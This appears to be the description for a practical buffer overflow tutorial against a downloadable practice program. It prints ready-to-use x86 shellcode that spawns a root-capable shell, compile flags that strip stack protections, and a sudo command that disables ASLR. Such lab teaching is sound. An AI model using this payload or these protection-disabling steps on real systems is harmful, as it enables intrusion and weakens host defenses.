How to exploit a buffer overflow vulnerability - Practical

This tutorial goes over the basic technique of how to exploit a buffer overflow vulnerability with an example. This tutorial assumes that you already have: basic C knowledge, gdb, gcc and how programs represent memory. The source code for the program can be downloaded at https://drive.google.com/file/d/0B8b0M2LATseXYWRiVHdkaGhwRjg/view?usp=drivesdk&resourcekey=0-ZRMkh5rVq_hvXW6Nb-cb6A The 46 byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" The compiling line is gcc -o example -fno-stack-protector -m32 -z execstack example.c -fno-stack-protector === Removes the canary value at the end of the buffer -m32 === Sets the program to compile into a 32 bit program -z execstack === Makes the stack executable NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal echo 0 | sudo tee /proc/sys/kernel/randomize_va_space When you are finished I strongly recommend you turn it back on with the command echo 2 | sudo tee /proc/sys/kernel/randomize_va_space If you enjoyed this tutorial and want to see more then please consider buying me a coffee! https://www.buymeacoffee.com/langotto. Definitely not required, but it definitely will be appreciated! * If your computer uses ARM then this won't work... if you don't know what this means then as of 2021 it should work if it's not a Raspberry Pi, phone, or an Apple computer released after 2020.